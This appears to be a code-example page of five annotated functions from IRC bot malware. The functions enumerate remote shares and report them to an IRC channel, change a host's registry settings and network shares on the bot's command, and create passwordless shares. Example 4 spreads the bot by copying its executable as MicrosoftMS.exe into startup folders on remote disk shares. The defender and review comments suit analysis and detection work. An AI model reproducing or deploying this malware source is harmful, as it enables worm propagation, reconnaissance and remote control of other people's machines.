Beispiel #1
// Enumerates the shares of ServerName at information level 502 and sends one
// formatted row per share (name, path, current use count, security-descriptor
// validity) to `chan` over the IRC socket.
//
// Parameters:
//   sock, chan, notice - passed unchanged to irc_privmsg().
//   ServerName         - host to query; converted with AsWideString() first.
// Returns TRUE when the last fNetShareEnum call returned ERROR_SUCCESS and
// FALSE otherwise (the error text has then already been sent to `chan`).
//
// Defender note: every share name and its local path leave the host through
// the IRC connection, so this routine is reconnaissance output, not a local
// diagnostic. Enumeration at level 502 followed by outbound IRC traffic is the
// observable pattern.
BOOL ListShares(SOCKET sock, char *chan, BOOL notice, char *ServerName)
{
	// One outgoing IRC line; IRCLINE is defined elsewhere in the project.
	char buffer[IRCLINE];

	PSHARE_INFO_502 pBuf,p;
	NET_API_STATUS nStatus;
	// NOTE(review): ownership of the AsWideString() result is not visible here;
	// this function never releases it.
	LPWSTR wServerName = (LPWSTR)AsWideString(ServerName);
	DWORD entriesread=0,totalread=0,resume=0;

	// Column header for the rows sent below.
	irc_privmsg(sock,chan,"Share name:    Resource:                Uses:  Desc:",notice);
 
	do {
		// fNetShareEnum is presumably a run-time resolved pointer to NetShareEnum
		// (its assignment is not in this block). -1 is the preferred-maximum-length
		// argument; `resume` carries the position across ERROR_MORE_DATA rounds.
		nStatus = fNetShareEnum(wServerName, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);

		if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
			p = pBuf;
 
			for(unsigned int i=1;i <= entriesread;i++) {
				// NOTE(review): unbounded sprintf. The share name and path are supplied
				// by the queried server and are not checked against IRCLINE, so a long
				// entry can write past the end of `buffer`.
	            sprintf(buffer,"%-14S %-24S %-6u %-4s",p->shi502_netname, p->shi502_path, p->shi502_current_uses, IsVSD(fIsValidSecurityDescriptor(p->shi502_security_descriptor)));
				irc_privmsg(sock,chan,buffer,notice,TRUE);

				p++;
			}

			// The enumeration buffer is released once per successful round.
			fNetApiBufferFree(pBuf);
		} else {
			// \x03 and \2 are IRC colour/bold control bytes around the "net" tag.
			// NOTE(review): also unbounded; the length of NasError()'s text is not
			// visible from here.
			sprintf(buffer,"-\x03\x34\2net\2\x03- share list error %s <%ld>",NasError(nStatus),nStatus);
			irc_privmsg(sock,chan,buffer,notice);
		}
	} while (nStatus == ERROR_MORE_DATA);	

	// Any status other than ERROR_SUCCESS on the final round is a failure.
	if(nStatus != ERROR_SUCCESS)
		return FALSE;
	
	return TRUE;
}
Beispiel #2
// Changes three settings on the local host and reports each result:
//   1. writes EnableDCOM = "N" under regkey3,
//   2. writes restrictanonymous = 1 under regkey4,
//   3. deletes every share whose name ends in '$' (or, if enumeration fails,
//      every entry of ShareList).
//
// Parameters:
//   sock, chan, notice - passed to irc_privmsg() for status lines.
//   silent             - when TRUE nothing is sent to IRC; addlog() still runs.
// Always returns TRUE, whatever the individual steps returned.
//
// Defender note: the host is being hardened by the process that controls it,
// not by its administrator. Writes to EnableDCOM and restrictanonymous plus
// removal of the '$' shares from one process are a usable behavioural
// signature. regkey3, regkey4 and ShareList are defined elsewhere in the
// project and are not visible here.
BOOL SecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
	char sendbuf[IRCLINE];

	// noadvapi32 is a project flag; the message on the else branch shows it
	// means advapi32.dll could not be loaded.
	if (!noadvapi32) {
		HKEY hKey;
		if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
			TCHAR szDataBuf[]="N";
			// NOTE(review): for REG_SZ the byte count is expected to include the
			// terminating NUL; strlen() leaves it out.
			if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
				sprintf(sendbuf,"4<<12[SECURE]: Disable DCOM failed.4>>");
			else
				sprintf(sendbuf,"4<<12[SECURE]: DCOM disabled.4>>");
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"4<<12[SECURE]: Failed to open DCOM registry key.4>>");
		// Report and log the DCOM result before sendbuf is reused.
		if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
		addlog(sendbuf);

		if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
			DWORD dwData = 0x00000001;
			if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
				sprintf(sendbuf,"4<<12[SECURE]: Failed to restrict access to the IPC$ Share.4>>");
			else
				sprintf(sendbuf,"4<<12[SECURE]: Restricted access to the IPC$ Share.4>>");
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"4<<12[SECURE]: Failed to open IPC$ Restriction registry key.4>>");
	} else
		sprintf(sendbuf,"4<<12[SECURE]: Advapi32.dll couldn't be loaded.4>>");
	// Sends either the restrictanonymous result or the advapi32 load failure.
	if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
	addlog(sendbuf);

	if (!nonetapi32) {
		PSHARE_INFO_502 pBuf,p;
		NET_API_STATUS nStatus;
		DWORD entriesread=0,totalread=0,resume=0;

		do {
			// NULL server name: the local machine is enumerated.
			nStatus = fNetShareEnum(NULL, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);

			if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
				p = pBuf;

				for(unsigned int i=1;i <= entriesread;i++) {
					// Only names whose last character is '$' are deleted.
					// NOTE(review): an empty name makes wcslen()-1 wrap around and
					// indexes far outside the string.
					if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') {
						// NOTE(review): ownership of the AsAnsiString() result is not
						// visible here; it is not released in this block.
						if(ShareDel(NULL,AsAnsiString(p->shi502_netname)) == NERR_Success)
							_snprintf(sendbuf,sizeof(sendbuf),"nzm (secure.plg) »»  Share '%S' deleted.",p->shi502_netname);
						else
							_snprintf(sendbuf,sizeof(sendbuf),"nzm (secure.plg) »»  Failed to delete '%S' share.",p->shi502_netname);
						// NOTE(review): _snprintf leaves sendbuf unterminated when the
						// output is truncated; nothing re-terminates it before use.
						if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
						addlog(sendbuf);
					}

					p++;
				}

				fNetApiBufferFree(pBuf);
			} else {
				// Enumeration failed: fall back to the fixed ShareList table.
				// NOTE(review): `i` is a signed int compared with an unsigned element
				// count. ShareName is handed to ShareDel() in the position where the
				// other branch passes an ANSI conversion, so it is presumably a
				// narrow string, while '%S' in the narrow printf family expects a
				// wide one - confirm against the NetShares declaration.
				for(int i=0;i < (sizeof(ShareList) / sizeof (NetShares));i++) {
					if(ShareDel(NULL,ShareList[i].ShareName) == NERR_Success)
						_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Share '%S' deleted.4>>",ShareList[i].ShareName);
					else
						_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Failed to delete '%S' share.4>>",ShareList[i].ShareName);
					if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
					addlog(sendbuf);
				}
			}
		} while (nStatus == ERROR_MORE_DATA);
		// This summary is written unconditionally, even if every deletion failed.
		sprintf(sendbuf,"4<<12[SECURE]: Network shares deleted.4>>");
	} else
		sprintf(sendbuf,"4<<12[SECURE]: Netapi32.dll couldn't be loaded.4>>");
	if (!silent) irc_privmsg(sock,chan, sendbuf, notice);
	addlog(sendbuf);

	return TRUE;
}
Beispiel #3
// Variant of SecureSystem with two extra steps. In order it:
//   1. writes EnableDCOM = "N" under regkey3,
//   2. writes restrictanonymous = 1 under regkey4,
//   3. writes restrictanonymoussam = 1 under regkey4,
//   4. unless NO_LSARESTRICT is defined, calls SearchForPrivilegedAccounts()
//      for "SeNetworkLogonRight",
//   5. unless NO_NET is defined, deletes every local share whose name ends in
//      '$' (or every ShareList entry if enumeration fails).
//
// Parameters:
//   sock, chan, notice - passed to irc_privmsg() for status lines.
//   silent             - when TRUE nothing is sent to IRC; addlog() still runs.
// Always returns TRUE, whatever the individual steps returned.
//
// Defender note: registry writes to EnableDCOM, restrictanonymous and
// restrictanonymoussam, a change to network-logon rights and removal of the
// '$' shares, all from one process that is not an administrative tool, are
// the observable pattern. regkey3, regkey4 and ShareList are defined
// elsewhere in the project.
BOOL SecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
	char sendbuf[IRCLINE];

	if (!noadvapi32) {
		HKEY hKey; 
		if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
			TCHAR szDataBuf[]="N"; 
			// NOTE(review): for REG_SZ the byte count is expected to include the
			// terminating NUL; strlen() leaves it out.
			if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
				sprintf(sendbuf,"[SECURE]: Disable DCOM failed.");
			else
				sprintf(sendbuf,"[SECURE]: DCOM disabled.");
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"[SECURE]: Failed to open DCOM registry key.");
		// Each step reports and logs before sendbuf is reused by the next one.
		if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
		addlog(sendbuf);

		if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
			DWORD dwData = 0x00000001;
			if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
				sprintf(sendbuf,"[SECURE]: Failed to restrict access to the IPC$ Share.");
			else
				sprintf(sendbuf,"[SECURE]: Restricted access to the IPC$ Share.");			
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"[SECURE]: Failed to open IPC$ Restriction registry key.");
		if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
		addlog(sendbuf);

		// Same key as above, second value.
		if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
			DWORD dwData = 0x00000001;
			if (fRegSetValueEx(hKey, "restrictanonymoussam", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
				sprintf(sendbuf,"[SECURE]: Failed to restrict anonymous enumeration of SAM accounts.");
			else
				sprintf(sendbuf,"[SECURE]: Restricted anonymous enumeration of SAM accounts.");			
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"[SECURE]: Failed to open enumeration of SAM accounts registry key.");
		if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
		addlog(sendbuf);

		// NOTE(review): when NO_LSARESTRICT is defined nothing rewrites sendbuf
		// here, so the send/log after this if/else repeats the SAM message.
		#ifndef NO_LSARESTRICT
		DWORD dwRet;
		// The helper's semantics are not visible here; per the messages below its
		// return value is treated as the number of accounts changed.
		// NOTE(review): dwRet is a DWORD but is printed with %d.
		if ((dwRet = SearchForPrivilegedAccounts(L"SeNetworkLogonRight", FALSE)) > 0)
			sprintf(sendbuf,"[SECURE]: Removed SeNetworkLogonRights from %d accounts in local system policy.", dwRet);
		else
			sprintf(sendbuf,"[SECURE]: Failed to remove SeNetworkLogonRights from any accounts in local system policy.");
		#endif
	} else
		sprintf(sendbuf,"[SECURE]: Advapi32.dll couldn't be loaded.");
	if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
	addlog(sendbuf);

	#ifndef NO_NET
	if (!nonetapi32) {
		PSHARE_INFO_502 pBuf,p;
		NET_API_STATUS nStatus;
		DWORD entriesread=0,totalread=0,resume=0;
 
		do {
			// NULL server name: the local machine is enumerated.
			nStatus = fNetShareEnum(NULL, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);

			if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
				p = pBuf;
 
				for(unsigned int i=1;i <= entriesread;i++) {
					// Only names whose last character is '$' are deleted.
					// NOTE(review): an empty name makes wcslen()-1 wrap around.
					if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') {	
						// NOTE(review): three defects in the conversion below.
						//  - sizeof(szShareName) is the size of a pointer, not of the
						//    allocation, so names that do not fit in that many bytes
						//    make WideCharToMultiByte fail and leave the buffer
						//    without defined contents;
						//  - the return value is not checked, so ShareDel() may then
						//    read an unterminated buffer;
						//  - wcslen()+1 bytes is too small for multi-byte code pages.
						char* szShareName = new char[wcslen(p->shi502_netname)+1];
						WideCharToMultiByte(CP_ACP, WC_NO_BEST_FIT_CHARS, p->shi502_netname, -1, szShareName, sizeof(szShareName), NULL, NULL);

						if(ShareDel(NULL,szShareName) == NERR_Success)
							_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Share '%S' deleted.",p->shi502_netname);
						else 
							_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Failed to delete '%S' share.",p->shi502_netname);
						// NOTE(review): _snprintf leaves sendbuf unterminated when the
						// output is truncated.
						if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
						addlog(sendbuf);

						// NOTE(review): allocated with new[] but released with scalar
						// delete; that mismatch is undefined behaviour.
						delete szShareName;
					}

					p++;
				}

				fNetApiBufferFree(pBuf);
			} else {
				// Enumeration failed: fall back to the fixed ShareList table.
				// NOTE(review): `i` is a signed int compared with an unsigned count.
				for(int i=0;i < (sizeof(ShareList) / sizeof (NetShares));i++) { 
					if(ShareDel(NULL,ShareList[i].ShareName) == NERR_Success)
						_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Share '%s' deleted.",ShareList[i].ShareName);
					else 
						_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Failed to delete '%s' share.",ShareList[i].ShareName);
					if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
					addlog(sendbuf);
				} 
			}
		} while (nStatus == ERROR_MORE_DATA);	
		// This summary is written unconditionally, even if every deletion failed.
		sprintf(sendbuf,"[SECURE]: Network shares deleted.");
	} else
		sprintf(sendbuf,"[SECURE]: Netapi32.dll couldn't be loaded.");
	if (!silent) irc_privmsg(sock,chan, sendbuf, notice);
	addlog(sendbuf);
	#endif

	return TRUE;
}
Beispiel #4
// Self-propagation routine. It enumerates the shares of the host `Addr` at
// information level 1 and, for every disk share, tries to copy the running
// executable into each directory listed in startupdirs under the fixed name
// MicrosoftMS.exe. The first successful copy is reported over IRC and ends the
// function.
//
// Parameters:
//   Addr - remote host, used to build the UNC prefix "\\<Addr>".
// Returns 2 when netapi32.dll or the needed entry points are unavailable and
// 1 on every other path, so the return value does not tell the caller whether
// a copy succeeded. The return type is BOOL, and both values are non-zero.
//
// Reading aid: as shown, the block uses `buffer`, `remotefile` and `exinfo`,
// none of which is declared here; they must come from file scope or the
// snippet is incomplete. `sendbuf` and `remoteinifilename` are declared but
// never used.
//
// Defender note: the indicator on this page is an executable named
// MicrosoftMS.exe appearing in a startup directory through an SMB share path.
// Blocking or alerting on executable writes to startup folders over the
// network, and removing write access to disk shares for ordinary accounts,
// stops this step.
BOOL NetBios(char * Addr)
{

	char szRemoteAddr[MAX_PATH];
	// NOTE(review): unbounded sprintf; the length of Addr is not checked.
	sprintf(szRemoteAddr,"\\\\%s",Addr);
	HINSTANCE netapi32_dll = LoadLibrary("netapi32.dll");

       		
	if (netapi32_dll) {
		fNetShareEnum = (RSP5) GetProcAddress(netapi32_dll, "NetShareEnum");
		// The lookup of NetApiBufferFree is commented out, yet the pointer is
		// still tested and called below, so it has to be assigned elsewhere.
		//fNetApiBufferFree = (NABF) GetProcAddress(netapi32_dll, "NetApiBufferFree");
		if (!fNetShareEnum || !fNetApiBufferFree) {
			//not xp/2000 ?
			// This return leaves netapi32_dll loaded (no FreeLibrary).
			return 2;
		}
	}
	else
		return 2; //dll's not found
	// The UNC prefix is converted to wide characters for the enumeration call.
	wchar_t wcRemoteAddr[MAX_PATH] = L"";
	mbstowcs(wcRemoteAddr, szRemoteAddr, strlen(szRemoteAddr) + 1);
   	PSHARE_INFO_1 BufPtr,p;
   	NET_API_STATUS res;
   	DWORD er=0,tr=0,resume=0, i;
	char thisfilename[MAX_PATH];
	char remotefilename[MAX_PATH];
	char remoteinifilename[MAX_PATH];
	char sendbuf[512];
	// Path of the currently running executable: the source of the copy.
	GetModuleFileName(NULL,thisfilename,sizeof(thisfilename));
   	do 
   	{
     		// The wide string is passed through a (CHAR *) cast to fit the RSP5
     		// function-pointer type, which is declared elsewhere.
     		res = fNetShareEnum ((CHAR *) wcRemoteAddr, 1, (LPBYTE *) &BufPtr, -1, &er, &tr, &resume);
      		if(res == ERROR_SUCCESS || res == ERROR_MORE_DATA)
        	{
         		p=BufPtr;
         		for(i=1;i<=er;i++)
         		{
				// Only disk shares are considered.
				if (p->shi1_type == STYPE_DISKTREE) 
				{


					int s;
					// startupdirs is a NULL-terminated table defined elsewhere.
					for (s=0;startupdirs[s] != NULL;s++)
					{

						memset(remotefilename,0,sizeof(remotefilename));
						// NOTE(review): shi1_netname comes from the API as a wide
						// string but is formatted with %s here - confirm how
						// PSHARE_INFO_1 is declared in this project.
						sprintf(remotefilename,"%s\\%s\\%s\\MicrosoftMS.exe",szRemoteAddr,p->shi1_netname,startupdirs[s]);
						// Third argument TRUE: the copy fails if the target file
						// already exists.
						if (CopyFile(thisfilename,remotefilename,TRUE) != 0) {

							// Success is announced on the IRC channel held in exinfo.
							_snprintf(buffer,sizeof(buffer),"[NetBios]: Exploiting IP: %s",remotefile);
							irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);

							fNetApiBufferFree(BufPtr);
							FreeLibrary(netapi32_dll);
         						return 1;
						}
					}

				}
            			p++;
         		}
         		fNetApiBufferFree(BufPtr);
        	}
		else 	{
			// Enumeration failed.
			FreeLibrary(netapi32_dll);
         		return 1;
		}
	}
   	while (res==ERROR_MORE_DATA); 
	FreeLibrary(netapi32_dll);
	return 1;
}
Beispiel #5
// Removes or creates network shares on the local host, depending on `secure`.
//
//   secure == TRUE  : every local share whose name ends in '$' is deleted with
//                     fNetShareDel; if enumeration fails, every ShareList
//                     entry is deleted instead.
//   secure == FALSE : every ShareList entry is created as a disk share with
//                     fNetShareAdd (remark "rofl", max 4 uses, no password).
//
// Parameters:
//   conn    - cast to IRC*; used only for privmsg() reporting.
//   target  - IRC destination of the report.
//   silent, verbose, loop - gate the reporting only. Shares are deleted or
//             created whatever their values; a report is produced only when
//             both `loop` and `silent` are FALSE, and `verbose` adds the list
//             of share names.
//
// Defender note: the FALSE branch re-exposes the ShareList paths as shares
// with no password, which is a weakening of the host, not a hardening. With
// file-share auditing enabled, share creation and deletion are recorded
// (events 5142 and 5144); the remark string "rofl" on a share is an indicator
// taken from this page. sec_title, unsec_title and ShareList are defined
// elsewhere in the project.
void SecureShares(BOOL secure, void *conn, char *target, BOOL silent, BOOL verbose, BOOL loop)
{
	IRC* irc=(IRC*)conn;
	char sendbuf[IRCLINE];
	char tmpBuffer[IRCLINE];
	int shdel=0;
	int shmake=0;

	if (secure)
	{
		PSHARE_INFO_502 pBuf,p;
		NET_API_STATUS nStatus;
		DWORD entriesread=0,totalread=0,resume=0;
			
		// sendbuf is initialised only when a report will be built; every later
		// strcat() on it sits behind the same !loop && !silent condition.
		if (!loop && !silent)
			sprintf(sendbuf,"%s Shares %s:",sec_title,"erased");

		do
		{
			// NULL server name: the local machine is enumerated.
			nStatus=fNetShareEnum(NULL,502,(LPBYTE *)&pBuf,-1,&entriesread,&totalread,&resume);

			if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA)
			{
				p = pBuf;
 
				for(unsigned int i=1;i <= entriesread;i++)
				{
					// Only names whose last character is '$' are deleted.
					// NOTE(review): an empty name makes wcslen()-1 wrap around.
					if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$')
					{
						if(fNetShareDel(NULL,(unsigned short *)p->shi502_netname,0) == NERR_Success)
						{
							if (!loop && !silent && verbose)
							{
								// NOTE(review): sprintf/strcat are unbounded; enough
								// deleted shares overflow sendbuf[IRCLINE].
								if (shdel>0)
									strcat(sendbuf,",");
								sprintf(tmpBuffer," %S",p->shi502_netname);
								strcat(sendbuf,tmpBuffer);
							}
							shdel++;
						}
					}
					p++;
				}
				fNetApiBufferFree(pBuf);
			}
			else
			{
				// Enumeration failed: fall back to the fixed ShareList table.
				// NOTE(review): ShareName is cast to unsigned short* without any
				// conversion; whether it is really a wide string depends on the
				// ShareList declaration - confirm.
				for(int i=0;i < (sizeof(ShareList)/sizeof(*ShareList));i++)
				{
					if(fNetShareDel(NULL,(unsigned short *)ShareList[i].ShareName,0) == NERR_Success)
					{
						if (!loop && !silent && verbose)
						{
							if (shdel>0)
								strcat(sendbuf,",");

							sprintf(tmpBuffer," %S",ShareList[i].ShareName);
							strcat(sendbuf,tmpBuffer);
						}
						shdel++;
					}
				}
			}
		} while (nStatus == ERROR_MORE_DATA);

		if (verbose && !loop && !silent)
		{
			if (shdel==0)
				irc->privmsg(target,"%s No shares %s.",sec_title,"erased");
			else
			{
				sprintf(tmpBuffer," - Total shares %s: %d.","erased",shdel);
				strcat(sendbuf,tmpBuffer);
				// NOTE(review): privmsg() is called with a format string plus
				// arguments elsewhere in this function, so it is presumably
				// printf-style; sendbuf contains share names and is passed as the
				// format here, so a '%' in a name would be parsed as a conversion.
				irc->privmsg(target,sendbuf);
			}
		}
		else if (!loop && !silent && !verbose)
		{
			// Non-verbose report: the count only.
			if (shdel==0)
				irc->privmsg(target,"%s No shares %s.",sec_title,"erased");
			else
			{
				irc->privmsg(target,"%s Total shares %s: %d.",sec_title,"erased",shdel);
			}
		}

	}
	else
	{ // Unsecure

		if (!loop && !silent)
			sprintf(sendbuf,"%s Shares %s:",unsec_title,"created");

		NET_API_STATUS res;
		SHARE_INFO_2 p;
		DWORD parm_err = 0;
		for (int i=0;i < (sizeof(ShareList) / sizeof (*ShareList));i++)
		{
			// All eight SHARE_INFO_2 members are assigned before the call.
			// NOTE(review): TEXT() is applied to a non-literal and the result is
			// cast to unsigned short*; no character-set conversion happens here.
			p.shi2_netname = (unsigned short *)TEXT(ShareList[i].ShareName);   
			p.shi2_type = STYPE_DISKTREE;
			p.shi2_remark = (unsigned short *)TEXT("rofl");
			p.shi2_permissions = 0;
			p.shi2_max_uses = 4;
			p.shi2_current_uses = 0;
			p.shi2_path = (unsigned short *)TEXT(ShareList[i].SharePath);
			p.shi2_passwd = NULL;
			// parm_err is filled by the call but never inspected.
			res=fNetShareAdd(NULL,2,(LPBYTE)&p,&parm_err);
			if(res==0)
			{
				if (!loop && !silent && verbose)
				{
					// NOTE(review): unbounded strcat, as in the secure branch.
					if (shmake>0)
						strcat(sendbuf,",");

					sprintf(tmpBuffer," %S",ShareList[i].ShareName);
					strcat(sendbuf,tmpBuffer);
				}
				shmake++;
			}
		}
		if (verbose && !loop && !silent)
		{
			if (shmake==0)
				irc->privmsg(target,"%s No shares %s.",unsec_title,"created");
			else
			{
				sprintf(tmpBuffer," - Total shares %s: %d.","created",shmake);
				strcat(sendbuf,tmpBuffer);
				// NOTE(review): sendbuf is again passed in the format position.
				irc->privmsg(target,sendbuf);
			}
		}
		else if (!verbose && !silent && !loop)
		{
			if (shmake==0)
				irc->privmsg(target,"%s No shares %s.",unsec_title,"created");
			else
			{
				irc->privmsg(target,"%s Total shares %s: %d.",unsec_title,"created",shmake);
			}
//			addlog(MAINLOG,sendbuf);
		}
	}
	return;
}